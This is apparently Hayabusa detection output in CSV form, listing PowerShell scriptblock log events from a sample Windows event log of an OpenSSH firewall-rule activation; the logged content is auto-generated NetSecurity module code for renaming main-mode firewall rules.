2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', 
Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
